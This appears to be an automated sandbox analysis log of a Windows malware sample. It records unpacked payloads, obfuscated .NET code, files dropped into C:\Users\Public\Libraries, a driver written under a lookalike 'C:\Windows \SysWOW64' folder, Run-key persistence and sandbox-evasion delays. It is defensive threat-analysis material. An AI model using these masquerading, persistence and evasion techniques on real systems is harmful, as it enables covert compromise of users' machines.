              Source: Binary string: easinvoker.pdbGCTL source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1576101598.00000000217D2000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1610085610.0000000020750000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1576101598.0000000021801000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.00000000207E3000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1700896503.000000000057D000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1700896503.00000000005AC000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.00000000207D0000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000017.00000003.1776083629.0000000000765000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000017.00000003.1776083629.0000000000736000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000007.00000000.1471597989.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1483116865.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1485238233.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1489880503.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr

              Data Obfuscation

              Source: C:\Users\Public\Libraries\xzeheenC.pif Unpacked PE file: 16.2.xzeheenC.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
              Source: C:\Users\Public\Libraries\xzeheenC.pif Unpacked PE file: 22.2.xzeheenC.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
              Source: C:\Users\Public\Libraries\xzeheenC.pif Unpacked PE file: 16.2.xzeheenC.pif.400000.0.unpack
              Source: C:\Users\Public\Libraries\xzeheenC.pif Unpacked PE file: 22.2.xzeheenC.pif.400000.0.unpack
              Source: Yara match File source: 10.2.spoolsv.COM.28f0000.1.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0000000A.00000002.1586646546.00000000022F6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000A.00000003.1494549261.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000A.00000002.1615024855.000000007FC80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: 16.2.xzeheenC.pif.2e330000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 16.2.xzeheenC.pif.2b37c896.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 16.3.xzeheenC.pif.2991aba0.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 16.2.xzeheenC.pif.2c596478.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: 16.2.xzeheenC.pif.2c5ce790.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
              Source: alpha.exe.3.dr Static PE information: 0xE1CBFC53 [Mon Jan 16 09:26:43 2090 UTC]
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_029087A0 LoadLibraryW,GetProcAddress,FreeLibrary, 10_2_029087A0
              Source: alpha.exe.3.dr Static PE information: section name: .didat
              Source: kn.exe.5.dr Static PE information: section name: .didat
              Source: C:\Users\Public\kn.exe Code function: 7_2_00007FF792D23668 push rsp; ret 7_2_00007FF792D23669
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_0291C2FC push 0291C367h; ret 10_2_0291C35F
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_028F32FC push eax; ret 10_2_028F3338
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_028F635C push 028F63B7h; ret 10_2_028F63AF
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_028F635A push 028F63B7h; ret 10_2_028F63AF
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_0291C0AC push 0291C125h; ret 10_2_0291C11D
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_0291C1F8 push 0291C288h; ret 10_2_0291C280
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_0291C144 push 0291C1ECh; ret 10_2_0291C1E4
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_029086C0 push 02908702h; ret 10_2_029086FA
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_028F673E push 028F6782h; ret 10_2_028F677A
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_028F6740 push 028F6782h; ret 10_2_028F677A
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_028FC4F4 push ecx; mov dword ptr [esp], edx 10_2_028FC4F9
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_0290E5B4 push ecx; mov dword ptr [esp], edx 10_2_0290E5B9
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_028FD528 push 028FD554h; ret 10_2_028FD54C
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_028FCB56 push 028FCCFAh; ret 10_2_028FCCF2
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_028FCB74 push 028FCCFAh; ret 10_2_028FCCF2
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_0291BB6C push 0291BD94h; ret 10_2_0291BD8C
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_02907894 push 02907911h; ret 10_2_02907909
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_029068D0 push 0290697Bh; ret 10_2_02906973
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_029068CE push 0290697Bh; ret 10_2_02906973
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_02908916 push 02908950h; ret 10_2_02908948
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_02908918 push 02908950h; ret 10_2_02908948
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_0290A920 push 0290A958h; ret 10_2_0290A950
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_02902EE8 push 02902F5Eh; ret 10_2_02902F56
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_02905E04 push ecx; mov dword ptr [esp], edx 10_2_02905E06
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_02902FF3 push 02903041h; ret 10_2_02903039
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_02902FF4 push 02903041h; ret 10_2_02903039
              Source: 16.2.xzeheenC.pif.2e330000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'B2O7fKYFnJNBC', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
              Source: 16.2.xzeheenC.pif.2b37c896.1.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'B2O7fKYFnJNBC', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
              Source: 16.3.xzeheenC.pif.2991aba0.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'B2O7fKYFnJNBC', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
              Source: 16.2.xzeheenC.pif.2c596478.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'B2O7fKYFnJNBC', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
              Source: 16.2.xzeheenC.pif.2c5ce790.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'B2O7fKYFnJNBC', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

              Persistence and Installation Behavior

              Source: C:\Users\Public\kn.exe File created: C:\Users\Public\Libraries\spoolsv.COM
              Source: C:\Users\Public\Libraries\spoolsv.COM File created: C:\Users\Public\Libraries\xzeheenC.pif
              Source: C:\Users\Public\Libraries\spoolsv.COM File created: C:\Users\Public\Libraries\Cneehezx.PIF
              Source: C:\Users\Public\Libraries\spoolsv.COM File created: C:\Windows \SysWOW64\truesight.sys
              Source: C:\Users\Public\Libraries\Cneehezx.PIF File created: C:\Windows \SysWOW64\truesight.sys
              Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\alpha.exe
              Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\kn.exe

              Boot Survival

              Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\alpha.exe
              Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\kn.exe
              Source: C:\Users\Public\Libraries\spoolsv.COM Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Cneehezx
              Source: C:\Users\Public\Libraries\spoolsv.COM Code function: 10_2_0290A95C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 10_2_0290A95C
              Source: C:\Users\Public\Libraries\xzeheenC.pif Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
              Source: C:\Users\Public\Libraries\xzeheenC.pif Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
              Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pif Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2980000 memory commit 500006912
              Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2981000 memory commit 500178944
              Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 29AC000 memory commit 500002816
              Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 29AD000 memory commit 500199424
              Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 29DE000 memory commit 501014528
              Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2AD6000 memory commit 500006912
              Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2AD8000 memory commit 500015104
              Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2990000 memory commit 500006912
              Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2991000 memory commit 500178944
              Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 29BC000 memory commit 500002816
              Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 29BD000 memory commit 500199424
              Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 29EE000 memory commit 501014528
              Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2AE6000 memory commit 500006912
              Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2AE8000 memory commit 500015104
              Source: C:\Users\Public\Libraries\spoolsv.COMMemory allocated: 28F0000 memory commit 500006912
              Source: C:\Users\Public\Libraries\spoolsv.COMMemory allocated: 28F1000 memory commit 500178944
              Source: C:\Users\Public\Libraries\spoolsv.COMMemory allocated: 291C000 memory commit 500002816
              Source: C:\Users\Public\Libraries\spoolsv.COMMemory allocated: 291D000 memory commit 500199424
              Source: C:\Users\Public\Libraries\spoolsv.COMMemory allocated: 294E000 memory commit 501014528
              Source: C:\Users\Public\Libraries\spoolsv.COMMemory allocated: 2A46000 memory commit 500006912
              Source: C:\Users\Public\Libraries\spoolsv.COMMemory allocated: 2A48000 memory commit 500015104
              Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: 2B2E0000 memory reserve | memory write watch
              Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: 2B590000 memory reserve | memory write watch
              Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: 2D590000 memory reserve | memory write watch
              Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: 30A40000 memory reserve | memory write watch
              Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: 32960000 memory reserve | memory write watch
              Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: 327B0000 memory reserve | memory write watch
              Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: 221F0000 memory reserve | memory write watch
              Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: 22780000 memory reserve | memory write watch
              Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: 22490000 memory reserve | memory write watch
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 922337203685477
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 600000
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599888
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599769
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599644
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599519
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599394
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599269
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599150
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599034
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598909
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598784
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598659
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598534
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598409
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598284
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598159
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598023
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597906
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597716
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597596
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597472
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597347
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597222
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597097
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596972
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596847
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596722
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596597
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596472
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596347
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596222
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596097
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595972
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595847
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595722
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595597
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595472
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595347
